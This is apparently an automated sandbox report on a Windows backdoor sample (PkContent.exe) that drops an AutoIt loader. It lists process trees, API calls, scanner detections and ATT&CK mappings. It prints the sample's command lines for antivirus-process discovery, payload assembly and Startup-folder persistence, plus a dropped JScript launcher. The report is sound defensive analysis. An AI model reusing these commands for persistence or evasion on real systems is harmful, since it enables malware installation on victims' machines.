Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00798B75 push ecx; ret 11_2_00798B88
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D8B75 push ecx; ret 17_2_008D8B88

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif File created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif File created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_00785EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_009359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_008C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PkContent.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr API coverage: 4.7 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PkContent.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PkContent.exe Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\PkContent.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007DCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_00914005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_0091FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr Code function: 17_2_00913CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Code function: 11_2_00785D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\724598\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\724598
Source: Thermal.pif, 0000000B.00000002.3937037466.0000000001109000.00000004.00000020.00020000.00000000.sdmp, HermesKey.scr, 00000011.00000002.3936909663.000000000150A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E45D5 BlockInput,11_2_007E45D5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00785240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_007A5CAC
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_007C88CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079A354 SetUnhandledExceptionFilter,11_2_0079A354
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0079A385
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_008DA385
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DA354 SetUnhandledExceptionFilter,17_2_008DA354
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C9369 LogonUserW,11_2_007C9369
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D1AC6 SendInput,keybd_event
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D51E2 mouse_event
Source: C:\Users\user\Desktop\PkContent.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif y
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exit
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029E5000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp, Thermal.pif, 0000000B.00000003.2114572247.0000000003969000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Thermal.pif, HermesKey.scr | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_0079885B cpuid
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007B0030 GetLocalTime,__swprintf
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007B0722 GetUserNameW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007A416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: HermesKey.scr | Binary or memory string: WIN_81
Source: HermesKey.scr | Binary or memory string: WIN_XP
Source: HermesKey.scr | Binary or memory string: WIN_XPe
Source: HermesKey.scr | Binary or memory string: WIN_VISTA
Source: HermesKey.scr | Binary or memory string: WIN_7
Source: HermesKey.scr | Binary or memory string: WIN_8
Source: HermesKey.scr.11.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007E696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007E6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0092696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_00926E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (one line per tactic; the number in front of a technique is the count shown in the report, techniques without a number are unmatched matrix entries):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 2 Native API; 1 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 11 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 111 Masquerading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 17 System Information Discovery; 31 Security Software Discovery; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 21 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1577543 | Sample: PkContent.exe | Start date: 18/12/2024 | Architecture: WINDOWS | Score: 92
Sample-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; 4 other signatures
Contacted domain: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
Process tree recovered from the behavior graph:
  • PkContent.exe started
    • cmd.exe started; dropped C:\Users\user\AppData\Local\...\Thermal.pif (PE32); signature: Drops PE files with a suspicious file extension
      • Thermal.pif started; dropped C:\Users\user\AppData\Local\...\HermesKey.scr (PE32) and C:\Users\user\AppData\Local\...\HermesKey.js (ASCII); signature: Drops PE files with a suspicious file extension
        • cmd.exe started; dropped C:\Users\user\AppData\...\HermesKey.url
          • conhost.exe started
      • cmd.exe started
      • conhost.exe started
      • 7 other processes
  • wscript.exe started; signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • HermesKey.scr started

Source | Detection | Scanner | Label
PkContent.exe | 63% | ReversingLabs | Win32.Backdoor.AsyncRat
PkContent.exe | 100% | Avira | BDS/Agent.tfscq
PkContent.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | 8% | ReversingLabs
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | unknown | unknown | false | (none) | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp, HermesKey.scr, 00000011.00000002.3935835156.0000000000979000.00000002.00000001.01000000.00000008.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | false | (none) | high
http://nsis.sf.net/NSIS_ErrorError | PkContent.exe | false | (none) | high
https://www.autoitscript.com/autoit3/ | PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | false | (none) | high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577543
          Start date and time:2024-12-18 15:29:44 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
Number of new started processes analysed:19
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:PkContent.exe
          Detection:MAL
          Classification:mal92.expl.evad.winEXE@28/14@2/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 102
          • Number of non-executed functions: 291
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: PkContent.exe
Time | Type | Description
15:30:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
          No context
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
  • ldqj18tn.exe | malicious | Unknown
  • ldqj18tn.exe | malicious | Unknown
  • EO3RT0fEfb.exe | malicious | Unknown
  • RMBOriPHVJ.exe | malicious | Unknown
  • S6x3K8vzCA.exe | malicious | Unknown
  • PPbimZI4LV.exe | malicious | Unknown
  • l5VhEpwzJy.exe | malicious | Unknown
  • duyba.lnk.download.lnk | malicious | Unknown
  • pt8GJiNZDT.exe | malicious | Unknown
Match: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
  • ldqj18tn.exe | malicious | Unknown
  • ldqj18tn.exe | malicious | Unknown
  • EO3RT0fEfb.exe | malicious | Unknown
  • RMBOriPHVJ.exe | malicious | Unknown
  • S6x3K8vzCA.exe | malicious | Unknown
  • PPbimZI4LV.exe | malicious | Unknown
  • l5VhEpwzJy.exe | malicious | Unknown
  • duyba.lnk.download.lnk | malicious | Unknown
  • pt8GJiNZDT.exe | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 176
Entropy (8bit): 4.784166343619961
Encrypted: false
SSDEEP: 3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5iQERuAcCwPcTFZo5uWAX+aJp6/h4EkD5i6:RiJBJHonwWDaJ0/hJkDB+uAcBwFywWDq
MD5: D85C354F477007A7AC2581AC9BFF7144
SHA1: 41015C3F57D442673E42CB162790AE5B39DDB96E
SHA-256: 82B7BAD61EC9ED1929B79C435AA4BBCD80F23608E6BC7F61FA24446A36AD65EF
SHA-512: 59AB7A7C992D88227AB1B96922F5024CD11DEBF23E872C3486BE2DDBD782D928BBC98DEF0F1DFB9115E3ECED1C0796AB312338E5CC42AAFBD1A7B3D3949B23CB
Malicious: true
Preview: new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\HermesKey.scr\" \"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\g\"")
Process: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.62028134425878
Encrypted: false
SSDEEP: 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5: 18CE19B57F43CE0A5AF149C96AECC685
SHA1: 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
